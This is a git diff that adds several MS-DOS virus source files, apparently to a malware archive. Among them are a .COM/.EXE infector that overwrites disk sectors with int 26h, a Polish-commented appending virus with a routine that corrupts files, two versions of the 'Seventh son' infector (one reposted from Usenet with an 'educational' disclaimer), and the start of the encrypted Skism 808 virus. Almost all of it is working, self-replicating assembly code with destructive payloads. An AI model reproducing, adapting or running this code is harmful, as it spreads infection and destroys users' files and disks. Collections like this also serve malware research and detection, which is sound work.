es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +; +; Get actual diskdrive +; + + mov ah,19h ; drive? + int 21h + +; +; Get actual path +; + + mov cs:drive,al ; save drive + mov ah,47h ; dir? + mov dh,0 + add al,1 + mov dl,al ; in actual drive? + lea si,cs:old_path + int 21h + +; +; Get actual number of present diskdrives.If only one diskdrive is present, +; the pointer for 'search_order' will transfered to 'search_order + 6' +; + + mov ah,0Eh ; how many disks + mov dl,0 + int 21h + mov al,1 + cmp al,1 ; one drive? + jne hups3 + mov al,6 +hups3: + mov ah,0 + lea bx,cs:search_order + add bx,ax + add bx,1 + mov cs:pointer,bx + clc + +; +; The carry-flag is set if the search will find no more .COM-files. To do +; it the easy way, all .EXE-files will get the .COM-extention to become +; infected. This will result in an error if the executed .EXE is to big. +; The error-message 'Program too big to fit in memory' will be the result. +; + +change_disk: + jnc no_name_change + mov ah,17h ; change exe to com + lea dx,cs:mask_exe + int 21h + cmp al,0FFh + jnz no_name_change ; .EXE found? + +; +; When no .COM or .EXE-files are found, sectors will be overwritten, +; depending from the system's time in the msec-range. This is the moment +; that the entire disk is infected. 'VIRUS' can not infect any more and +; starts the destruction. +; + + mov ah,2Ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; Write shit on disk + +; +; Test if the end of the seek-procedure or of the table has been reached. +; If so: end. +; + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0FFh + jnz hups2 + jmp hops + +; +; Get new disk from the list with search orders and make it the actual one. +; + +hups2: + mov ah,0Eh + int 21h ; change disk + +; +; Start at the ROOT-Directory. +; + + mov ah,3Bh ; change path + lea dx,cs:path + int 21h + jmp find_first_file + +; +; Starting from the ROOT-dir, search for the first sub-dir. Previous change +; all .EXE-files into .COM-files in the old directory. +; + +find_first_subdir: + mov ah,17h ; change exe to com + lea dx,cs:mask_exe + int 21h + mov ah,3Bh ; use root dir + lea dx,cs:path + int 21h + mov ah,4Eh ; search for first subdir + mov cx,11h ; dir mask + lea dx,cs:mask_dir + int 21h + jc change_disk + mov bx,cs:counter + inc bx + dec bx + jz use_next_subdir + +; +; Search for the next sub-dirs. Change to other drive if no sub-dir is +; found. +; + +find_next_subdir: + mov ah,4Fh ; search for next sub-dir. + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +; +; Change found sub-dir in actual one. +; + +use_next_subdir: + mov ah,2Fh ; get dta address + int 21h + add bx,1Ch + mov word ptr es:[bx],'\' ; address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3Bh ; change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +; +; Search first .COM-file in the actual directory. If no .COM-files present, +; search the next directory. +; + +find_first_file: + mov ah,4Eh ; search for first + mov cx,1 ; mask + lea dx,cs:mask_com + int 21h + jc find_first_subdir + jmp short check_if_ill + +; +; If the file is already infected, search next file. +; + +find_next_file: + mov ah,4Fh ; search for next + int 21h + jc find_first_subdir + +; +; Test on infection. +; + +check_if_ill: + mov ah,3Dh ; open channel + mov al,2 ; read/write + mov dx,9Eh ; address of name in dta + int 21h + mov bx,ax ; save channel + mov ah,3Fh ; read file + mov cx,buflen + mov dx,buffer ; write in buffer + int 21h + mov ah,3Eh ; close file + int 21h + +; +; Test if the three NOPs of 'VIRUS' are present. If so, the file is already +; infected, continue searching. +; + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + +; +; Erase the write-protection attribute from MS-DOS. +; + + mov ah,43h ; write enable + mov al,0 + mov dx,9Eh ; address of name in dta + int 21h + mov ah,43h + mov al,1 + and cx,0FEh + int 21h + +; +; Open file for writing/reading. +; + + mov ah,3Dh ; open channel + mov al,2 ; read/write + mov dx,9Eh ; address of name in dta + int 21h + +; +; Store date of file for later use. +; + + mov bx,ax ; channel + mov ah,57h ; get date + mov al,0 + int 21h + push cx ; save data + push dx + +; +; Save the original jump from program. +; + + mov dx,cs:[conta] ; save old jmp + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] ; save new jump + lea cx,cs:cont-100h + sub dx,cx + mov cs:[conta],dx + +; +; 'VIRUS' copies itself to the beginning of a file. +; + + mov ah,40h ; write virus + mov cx,buflen ; length buffer + lea dx,main ; write virus + int 21h + +; +; Restore the old file-date. +; + + mov ah,57h ; write date + mov al,1 + pop dx + pop cx ; restore date + int 21h + +; +; Close file. +; + + mov ah,3Eh ; close file + int 21h + +; +; Restore the old jump-address. 'VIRUS' stores at address 'conta' the jump +; which was at the beginning of the host-program. This will keep the host- +; program as much executable as possible. After storing the address, it +; works with the jumpaddress of 'VIRUS'. 'VIRUS' will thus be in the +; work-memory of the program. +; + + mov dx,cs:[jmpbuf] ; restore old jmp + mov cs:[conta],dx +hops: + nop + call use_old + +; +; Continue the execution of the host-program. +; + + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +; +; Activate the diskdrive choosen at the entry of the program. +; + +use_old: + mov ah,0eh ; use old drive + mov dl,cs:drive + int 21h + +; +; Activate the path choosen at the entry of the program. +; + + mov ah,3Bh ; use old dir + lea dx,cs:[1FDh] ; get old path and + ; backslash + int 21h + ret + + +search_order db 0FFh,1,0,2,3,0FFh,0,0FFh +pointer dw 0000 +counter dw 0000 +disks db 0 +mask_com db "*.com",00 ; search for com-files +mask_dir db "*",00 ; search for dirs +mask_exe db 0FFh, 0, 0, 0, 0, 0, 3Fh + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +mask_all db 0FFh, 0, 0, 0, 0, 0, 3Fh + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +;; mask_all is never used by the code and easilly can be ommited +;; to shorten the code + +buffer equ 0e000h ; a save place +buflen equ 230h ; length of virus + +;; At this place I disagree with Ralf. The actual length of the virus +;; is 21Dh bytes when compiled in MASM and 219h bytes when compiled +;; in A86. Because it was Ralf's intention to compile this in MASM +;; 21Dh should be the original length. + +jmpbuf equ buffer+buflen ; a save place for jmp +path db "\",0 ; first path +drive db 0 ; actual drive +back_slash db "\" + +;; This variable is never used in the code and easilly can be ommited +;; to shorten the code. + +old_path db 32 dup (?) ; old path + +code ends + + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.583virus.asm b/MSDOS/Virus.MSDOS.Unknown.583virus.asm new file mode 100644 index 00000000..f8eb6a05 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.583virus.asm @@ -0,0 +1,324 @@ +; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648. +; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem. +; Komentarze te poprzedzane s znakami AK:. +; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990. + +comment ; +********************************************************** +wszystkie adresy w programie sa uzywane jako wzgledne +do rejestru si ,nie mozna urzywac adresow bezwzglednych +jako offset poniewaz po 'doklejeniu sie do programu +moze on byc w roznych miejscach +********************************************************** +; +adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych + ;w programie wzgledem niego beda + ;obliczane przesuniecia pol zmiennych +start_prg equ 100h ;adres poczatku programu typu .com +ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy +get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA +msdos equ 21h +write equ 40h +wirus_len equ DTA + 43 - start + +code segment byte public 'code' + assume cs:code,ds:code,es:code + + org 100h + +st1: jmp short start + + int msdos + +start: mov dx,offset stare_DTA + cld ;ustawienie kierunku przesylania + mov si,dx ;poczatek zmiennych programu + add si,ofst_rozk ;adres pola rozkazy + mov di,100h ;adres pod ktorym jest poczatek programu + mov cx,3 ;ilosc bajtow do przeslania + repz movsb ;odtworzenie starego poczatku + + mov si,dx ;odtworzenie si + +; AK: pominito badanie wersji DOS + + push es ;zachowanie es bo bedzie zmieniane + mov ah,get_dta_addr ;pobierz adres DTA + int msdos + mov [si],bx ;zapamietanie adresu DTA w polu + mov [si+2],es ;stare_DTA + pop es ;odtworzenie es + + mov dx,5Fh ;adres pola DTA + add dx,si + mov ah,1Ah ;ustaw adres DTA ds:dx + int msdos + +; AK: zmieniona jest kolejno instrukcji, teraz do przechowania SI uyto +; DX zamiast stosu + + push es ;zachowanie es + push si ;zachowaj si + add si,1ah ;adres tekstu PATH= + mov dx,si + mov es,ds:[2Ch] ;adres srodowiska set + +; AK: w oryginale jest to PUSH SI, POP SI + + mov di,0 + +szukaj_dalej: + mov si,dx + lodsb + mov cx,8000h ;dlugosc srodowiska + repnz scasb ;szukanie litery P + mov cx,4 ;dlugosc reszty ATH= + +porownuj: + lodsb + scasb + jnz szukaj_dalej + loop porownuj + + pop si ;odtworz rejestry + pop es + + mov [si+16h],di ;adres pierwszego bajtu za PATH= + mov di,si + add di,1Fh ;adres bufora dla nazwy zbioru + mov bx,si + jmp short dalej + +nast_sciezka: + cmp word ptr[si+16h],0 ;czy koniec path + jnz l1 ;nie + + jmp exit1 ;zakoncz nie ma wiecej zbiorow + +l1: push ds + push si + mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany + mov di,si + mov si,es:[di+16h] + add di,1Fh + +next: lodsb ;zaladuj kolejny znak sciezki dostepu + cmp al,';' ;czy koniec definicji scierzki + jz koniec_sciezki + cmp al,0 ;czy koniec lancucha path + jz koniec_set + stosb ;przepisz znak do bufora + jmp short next + +koniec_set: + mov si,0 +koniec_sciezki: + pop bx + pop ds + mov [bx+16h],si ;adres do ktorego przeszukano path + cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \ + jz dalej + mov al,'\' + stosb ;dopisz \ + +dalej: mov [bx+18h],di + mov si,bx + add si,10h + mov cx,6 + repz movsb ;przepisanie *.com \0 + mov si,bx + mov ah,4Eh ;find first + mov dx,1Fh + add dx,si + mov cx,3 ;ukryty tylko do odczytu + int msdos + jmp short czy_jest + +szuk_nast: + mov ah,4Fh ;find next + int msdos + +czy_jest: + jnc jest + + jmp short nast_sciezka + +jest: mov ax,[si+75h] ;pole zawierajace czas w DTA + and al,1Fh ;czy sa 62 sekundy + cmp al,1Fh + + jz szuk_nast + cmp word ptr [si+79h],0FA00h + ja szuk_nast ;jesli zbyt dlugi + cmp word ptr [si+79h],10 + jc szuk_nast + + mov di,[si+18h] + push si + add si,7Dh +kopiuj: + lodsb ;kopiuje nazwe zbioru + stosb ;nazwa w postaci ASCIIZ + cmp al,0 ;czy koniec nazwy + jnz kopiuj + pop si + + mov ax,4300h ;pobierz atrybuty zbioru + mov dx,1Fh + add dx,si + int msdos + mov [si+8],cx ;zapamietanie atrybutow + + mov ax,4301h ;ustaw atrybuty + and cx,0FFFEh ;usuwa ewentualne r/o + mov dx,1Fh + add dx,si + int msdos + + mov ax,3D02h ;otwarcie zbioru + mov dx,1Fh + add dx,si + int msdos + + jnc l2 ;czy poprawne otwarcie + + jmp exit2 + +l2: mov bx,ax + mov ax,5700h ;pobierz czas i date powstania zbioru + int msdos + mov [si+4],cx ;czas + mov [si+6],dx ;data + + mov ah,2Ch ;pobierz czas systemowy + int msdos + + and dh,7 ;sekundy + jnz zostaw + +comment ; +********************************************************** +tutaj mozna umiescic dowolna procedure uszkadzajaca zbior +ta wywolywana jest losowo jesli ostatnie trzy bity sekund +zegara systemu sa rowne zero np. 8,16,24 itd. +********************************************************** +; + mov ah,write ;zapis do zbioru + mov cx,5 ;pieciu bajtow lezacych + mov dx,si ;juz poza programem czyli + add dx,8Ah ;faktycznie dowolnych + int msdos + jmp exit3 + +;********************************************************* +;koniec procedury uszkadzajacej zbior +;********************************************************* + +zostaw: mov ah,3Fh ;odczyt trzech pierwszych + mov cx,3 ;bajtow z pliku + mov dx,ofst_rozk ;do pola rozkazy + add dx,si + int msdos + + jc exit3 ;jesli byl blad czytania + + cmp ax,3 ;czy odczytano dokladnie + jnz exit3 ;trzy bajty + + mov ax,4202h ;przewiniecie zbioru na koniec + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov cx,ax ;w ax dlugosc zbioru + sub ax,3 +;obiczanie przesuniecia dla skoku do poczatku wirusa +;jest to adres konca zbioru minus 3 poniewaz +;jmp jest trzy bajtowy + + mov [si+0Eh],ax ;zapis adresu w polu skok + + add cx,adr_baz - start + start_prg +;obliczanie adresu poczatku danych (tego ktory jest w si) +;jest to adres pola stare_DTA + 100h przesuniecia programu + + mov di,si + sub di,adr_baz - start - 1 + mov [di],cx ;zapisanie adresu bezposrednio w pole + ;w pole rozkazu mov dx,offset + + mov ah,write ;dopisanie wirusa na koniec + mov cx,wirus_len ;dlugosc wirusa + mov dx,si + sub dx,adr_baz - start ;obliczenie adresu poczatku wirusa + int msdos + + jc exit3 ;jesli blad + cmp ax,wirus_len ;czy zapisano calego wirusa + jnz exit3 + + mov ax,4200h ;przewiniecie zbioru na poczatek + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov ah,write ;zapis jmp do wirusa + mov cx,3 ;na poczatku + mov dx,si + add dx,0Dh ;pole skok + int msdos + +exit1: mov dx,[si+6] ;data + mov cx,[si+4] ;czas + or cx,1Fh ;zaznaczenie ze zbior jest zarazony + ;ilosc sekund = 62 + + mov ax,5701h ;zapis daty i czasu do zbioru + int msdos + + mov ah,3Eh ;zamkniecie zbioru + int msdos + +exit2: mov ax,4301h ;ustawienie atrybutow + mov cx,[si+8] ;stare atrybuty + mov dx,001Fh + add dx,si + int msdos + +exit3: push ds + mov ah,1Ah ;ustaw adres DTA + mov dx,[si+0] ;pole stare_DTA + mov ds,es:[si+2] + int msdos + + pop ds + + xor ax,ax ;zerowanie rejestrow + xor bx,bx + xor dx,dx + xor si,si + mov di,0100h ;na stos adres startu + push di + xor di,di + ret + +stare_DTA dd 0 +czas_zb dw 0 +data_zb dw 0 +attr_zb dw 0 +rozkazy db 0b4h,4ch,0cdh +skok db 0e9h,0,0 ;kod rozkazu jmp +zbior db '*.com',0 +srodow dw 0 ;adres srodowiska set +bufor dw 0 ;wskaznik do nazwy zbioru +path db 'PATH=' +nazwa_zb db 63 dup(0) ;pole na nazwe zbioru +DTA db 43 dup(0) ;pole dta + +code ends + end st1 + diff --git a/MSDOS/Virus.MSDOS.Unknown.7son.asm b/MSDOS/Virus.MSDOS.Unknown.7son.asm new file mode 100644 index 00000000..9e1c79c2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.7son.asm @@ -0,0 +1,251 @@ +From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 +Xref: netcom.com alt.comp.virus:506 +Path: netcom.com!ix.netcom.com!netnews +From: Zeppelin@ix.netcom.com (Mr. G) +Newsgroups: alt.comp.virus +Subject: 7th Son Virus +Date: 29 Nov 1994 13:02:59 GMT +Organization: Netcom +Lines: 236 +Distribution: world +Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com> +References: +NNTP-Posting-Host: ix-pas2-10.ix.netcom.com + +;*********************************************************************** +***** +;* Seventh son of a seventh son version 4 +;* +;* Compile with MASM 4.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;*********************************************************************** +***** + +cseg segment + assume cs:cseg,ds:cseg,es:cseg,ss:cseg + + .RADIX 16 + +FILELEN equ end - start +MINTARGET equ 1000d +MAXTARGET equ -(FILELEN+40) + + + +;*********************************************************************** +***** +;* Dummy program (infected) +;*********************************************************************** +***** + + org 100 + +begin: db 4Dh ;virus mark + db 0E9h, 4, 0 ;jump to virus entry + + +;*********************************************************************** +***** +;* Begin of the virus +;*********************************************************************** +***** + +start: db 0CDh, 20h, 0, 0 + + cld + mov si,0100h + push si ;push new IP on stack + mov di,si + add si,[si+2] ;si -> start + + push si ;restore original begin + movsw + movsw + pop si + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + lea dx,[si+(offset ni24 - 0104)] ;set new int24 +vector + mov ah,25h + push ax + int 21 + + mov ah,2Fh ;get DTA adres + int 21 + push es + push bx + + add dx,070h ;set new DTA adres + mov ah,1Ah + int 21 + add dx,1Eh + push dx + + lea di,[si+(offset generation-0104)] ;check +generation + cmp [di],0707h + jne verder + + lea dx,[di+2] ;7th son of a 7th son! + mov ah,09h + int 21 + +verder: mov ax,[di] ;update generations + xchg ah,al + mov al,1 + mov [di],ax + + lea dx,[di+33d] ;find first COM-file + xor cx,cx + mov ah,4Eh +infloop: int 21 + pop dx + jc stop + + push dx + + xor cx,cx ;clear +read-only-arttribute + mov ax,4301 + int 21 + jc return1 + + mov ax,3D02h ;open the file + int 21 + jc return1 + xchg bx,ax + + mov ax,5700h ;get file date & time + int 21 + push cx + push dx + + mov cx,4 ;read begin of file + mov dx,si + mov ah,3fh + int 21 + + cmp byte ptr [si],4Dh ;already infected or an +EXE? + je return2 + cmp byte ptr [si],5Ah ;or a weird EXE? + je return2 + + mov al,2 ;go to end of file + call seek + + cmp ax,MAXTARGET ;check length of file + jnb return2 + cmp ax,MINTARGET + jbe return2 + + push ax + mov cx,FILELEN ;write program to end of +file + mov ah,40h + int 21 + cmp ax,cx ;are all bytes written? + pop ax + jnz return2 + + xchg ax,bp + mov al,0 ;go to begin of file + call seek + + mov word ptr [si],0E94Dh ;write mark and +jump-command + mov word ptr [si+2],bp + mov ah,40h + int 21 + + inc byte ptr [di] ;number of next son + +return2: pop dx ;restore file date & +time + pop cx + mov ax,5701h + int 21 + + mov ah,3Eh ;close the file + int 21 + +return1: mov ah,4Fh ;find next file + jmp short infloop + +stop: pop dx ;restore DTA adres + pop ds + mov ah,1Ah + int 21 + + pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + push cs + push cs + pop ds + pop es + + ret + +seek: mov ah,42 + cwd +int21: xor cx,cx + int 21 + mov cl,4 + mov dx,si + ret + + +;*********************************************************************** +***** +;* Interupt handler 24 +;*********************************************************************** +***** + +ni24: mov al,03 + iret + + +;*********************************************************************** +***** +;* Data +;*********************************************************************** +***** + +generation db 1,1 +sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' +filename db '*.COM',0 + db '' + +end: + +cseg ends + end begin + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.7son2.asm b/MSDOS/Virus.MSDOS.Unknown.7son2.asm new file mode 100644 index 00000000..3e5e30ba --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.7son2.asm @@ -0,0 +1,232 @@ +;**************************************************************************** +;* Seventh son of a seventh son version 2 +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:cseg,ss:cseg + +FILELEN equ end - start +MINTARGET equ 1000 +MAXTARGET equ -(FILELEN+40h) + + org 100h + + .RADIX 16 + + +;**************************************************************************** +;* Dummy program (infected) +;**************************************************************************** + +begin: db 4Dh + jmp start + + +;**************************************************************************** +;* Begin of the virus +;**************************************************************************** + +start: call start2 +start2: pop bp + sub bp,0103h + + lea si,[bp+offset begbuf-4] ;restore begin of file + mov di,0100h + movsw + movsw + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + mov dx,offset ni24 - 4 ;set new int24 vector + add dx,bp + mov ax,2524h + int 21 + + lea dx,[bp+offset end] ;set new DTA adres + mov ah,1Ah + int 21 + add dx,1Eh + mov word ptr [bp+offset nameptr-4],dx + + lea si,[bp+offset grandfather-4] ;check generation + cmp [si],0606h + jne verder + + lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! + mov ah,09h + int 21 + +verder: mov ax,[si] ;update generations + xchg ah,al + xor al,al + mov [si],ax + + lea dx,[bp+offset filename-4] ;find first COM-file + xor cx,cx + mov ah,4Eh + int 21 + +infloop: mov dx,word ptr [bp+offset nameptr-4] + call infect + + mov ah,4Fh ;find next file + int 21 + jnc infloop + + pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + push cs + push cs + pop ds + pop es + mov ax,0100h ;put old start-adres on stack + push ax + + ret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov ax,4300h ;ask attributes + int 21 + push cx + + xor cx,cx ;clear flags + call setattr + jc return1 + + mov ax,3D02h ;open the file + int 21 + jc return1 + xchg bx,ax + + mov ax,5700h ;get file date & time + int 21 + push cx + push dx + + mov cx,4 ;read begin of file + lea dx,[bp+offset begbuf-4] + mov ah,3fh + int 21 + + mov al,byte ptr [bp+begbuf-4] ;already infected? + cmp al,4Dh + je return2 + cmp al,5Ah ;or a weird EXE? + je return2 + + call endptr ;get file-length + + cmp ax,MAXTARGET ;check length of file + jnb return2 + cmp ax,MINTARGET + jbe return2 + + push ax + mov cx,FILELEN ;write program to end of file + lea dx,[bp+offset start-4] + mov ah,40h + int 21 + cmp ax,cx ;are all bytes written? + pop ax + jnz return2 + + sub ax,4 ;calculate new start-adres + mov word ptr [bp+newbeg-2],ax + + call beginptr ;write new begin of file + mov cx,4 + lea dx,[bp+offset newbeg-4] + mov ah,40h + int 21 + + inc byte ptr [si] ;number of next son + +return2: pop dx ;restore file date & time + pop cx + mov ax,5701h + int 21 + + mov ah,3Eh ;close the file + int 21 + +return1: pop cx ;restore file-attribute +; call setattr + +; ret + + +;**************************************************************************** +;* Changes file-attributes +;**************************************************************************** + +setattr: mov dx,word ptr [bp+offset nameptr-4] + mov ax,4301h + int 21 + ret + + +;**************************************************************************** +;* Subroutines for file-pointer +;**************************************************************************** + +beginptr: mov ax,4200h ;go to begin of file + jmp short ptrvrdr + +endptr: mov ax,4202h ;go to end of file +ptrvrdr: xor cx,cx + xor dx,dx + int 21 + ret + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Data +;**************************************************************************** + +begbuf db 0CDh, 20h, 0, 0 +newbeg db 4Dh, 0E9h, 0, 0 +nameptr dw ? +sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' +grandfather db 0 +father db 0 +filename db '*.COM',0 + db '' + +end: + +cseg ends + end begin + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.7son4.asm b/MSDOS/Virus.MSDOS.Unknown.7son4.asm new file mode 100644 index 00000000..d5420f3c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.7son4.asm @@ -0,0 +1,218 @@ +;**************************************************************************** +;* Seventh son of a seventh son version 4 +;* +;* Compile with MASM 4.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:cseg,ss:cseg + + .RADIX 16 + +FILELEN equ end - start +MINTARGET equ 1000d +MAXTARGET equ -(FILELEN+40) + + + +;**************************************************************************** +;* Dummy program (infected) +;**************************************************************************** + + org 100 + +begin: db 4Dh ;virus mark + db 0E9h, 4, 0 ;jump to virus entry + + +;**************************************************************************** +;* Begin of the virus +;**************************************************************************** + +start: db 0CDh, 20h, 0, 0 + + cld + mov si,0100h + push si ;push new IP on stack + mov di,si + add si,[si+2] ;si -> start + + push si ;restore original begin + movsw + movsw + pop si + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector + mov ah,25h + push ax + int 21 + + mov ah,2Fh ;get DTA adres + int 21 + push es + push bx + + add dx,070h ;set new DTA adres + mov ah,1Ah + int 21 + add dx,1Eh + push dx + + lea di,[si+(offset generation-0104)] ;check generation + cmp [di],0707h + jne verder + + lea dx,[di+2] ;7th son of a 7th son! + mov ah,09h + int 21 + +verder: mov ax,[di] ;update generations + xchg ah,al + mov al,1 + mov [di],ax + + lea dx,[di+33d] ;find first COM-file + xor cx,cx + mov ah,4Eh +infloop: int 21 + pop dx + jc stop + + push dx + + xor cx,cx ;clear read-only-arttribute + mov ax,4301 + int 21 + jc return1 + + mov ax,3D02h ;open the file + int 21 + jc return1 + xchg bx,ax + + mov ax,5700h ;get file date & time + int 21 + push cx + push dx + + mov cx,4 ;read begin of file + mov dx,si + mov ah,3fh + int 21 + + cmp byte ptr [si],4Dh ;already infected or an EXE? + je return2 + cmp byte ptr [si],5Ah ;or a weird EXE? + je return2 + + mov al,2 ;go to end of file + call seek + + cmp ax,MAXTARGET ;check length of file + jnb return2 + cmp ax,MINTARGET + jbe return2 + + push ax + mov cx,FILELEN ;write program to end of file + mov ah,40h + int 21 + cmp ax,cx ;are all bytes written? + pop ax + jnz return2 + + xchg ax,bp + mov al,0 ;go to begin of file + call seek + + mov word ptr [si],0E94Dh ;write mark and jump-command + mov word ptr [si+2],bp + mov ah,40h + int 21 + + inc byte ptr [di] ;number of next son + +return2: pop dx ;restore file date & time + pop cx + mov ax,5701h + int 21 + + mov ah,3Eh ;close the file + int 21 + +return1: mov ah,4Fh ;find next file + jmp short infloop + +stop: pop dx ;restore DTA adres + pop ds + mov ah,1Ah + int 21 + + pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + push cs + push cs + pop ds + pop es + + ret + +seek: mov ah,42 + cwd +int21: xor cx,cx + int 21 + mov cl,4 + mov dx,si + ret + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Data +;**************************************************************************** + +generation db 1,1 +sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' +filename db '*.COM',0 + db '' + +end: + +cseg ends + end begin + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.808.asm b/MSDOS/Virus.MSDOS.Unknown.808.asm new file mode 100644 index 00000000..c08f8cea --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.808.asm @@ -0,0 +1,306 @@ + +;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS. + + + +FILENAME equ 30 ;USED TO FIND FILE NAME +FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES +FILEDATE equ 24 ;USED TO FIND FILE DATE +FILETIME equ 22 ;USED TO FIND FILE TIME + + + +CODE_START equ 0100H ;START OF ALL .com FILES +VIRUS_SIZE equ 808 ;tr 808 + + +CODE SEGMENT 'CODE' +ASSUME CS:CODE,DS:CODE,ES:CODE + ORG CODE_START + +MAIN PROC NEAR + +JMP VIRUS_START + +ENCRYPT_VAL DB 00H + +VIRUS_START: + + CALL ENCRYPT ;ENCRYPT/DECRYPT FILE + JMP VIRUS ;GO TO START OF CODE + +ENCRYPT: + + PUSH CX + MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA + +XOR_LOOP: + + MOV CH,[BX] ;READ CURRENT BYTE + XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY + MOV [BX],CH ;SWITCH BYTES + INC BX ;MOVE BX UP A BYTE + CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE + ;ARE WE DONE WITH THE ENCRYPTION + JLE XOR_LOOP ;NO? KEEP GOING + POP CX + RET + + +INFECTFILE: + + MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY + MOV BX,HANDLE ;LOAD BX WITH HANDLE + PUSH BX ;SAVE HANDLE ON STACK + CALL ENCRYPT ;ENCRYPT FILE + POP BX ;GET BACK BX + MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE + MOV AH,40H ;WRITE TO FILE + INT 21H ; + PUSH BX + CALL ENCRYPT ;FIX UP THE MESS + POP BX + RET + +VIRUS_CODE: + +WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT +FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT +FILESPEC2 DB "*.*",0 +ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY +DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta +FILEDATA DB 43 DUP (?) ;HOLDS FILES dta +DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT +DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET +TEMPOFS DW ? ;HOLDS OFFSET +TEMPSEG DW ? ;HOLDS SEGMENT +DRIVECODE DB ? ;HOLDS DRIVE CODE +CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS +HANDLE DW ? ;HOLDS FILE HANDLE +ORIG_TIME DW ? ;HOLDS FILE TIME +ORIG_DATE DW ? ;HOLDS FILE DATE +ORIG_ATTR DW ? ;HOLDS FILE ATTR +IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID + +VIRUS: + + MOV AX,3000H ;GET DOS VERSION + INT 21H ; + CMP AL,02H ;IS IT AT LEAST 2.00? + JB BUS1 ;WON'T INFECT LESS THAN 2.00 + MOV AH,2CH ;GET TIME + INT 21H ; + MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO + ;THERES 100 MUTATIONS POSSIBLE +SETDTA: + + MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA + MOV AH,1AH ;SET DTA ADDRESS + INT 21H ; + +NEWDIR: + + MOV AH,19H ;GET DRIVE CODE + INT 21H ; + MOV DL,AL ;SAVE DRIVECODE + INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER + 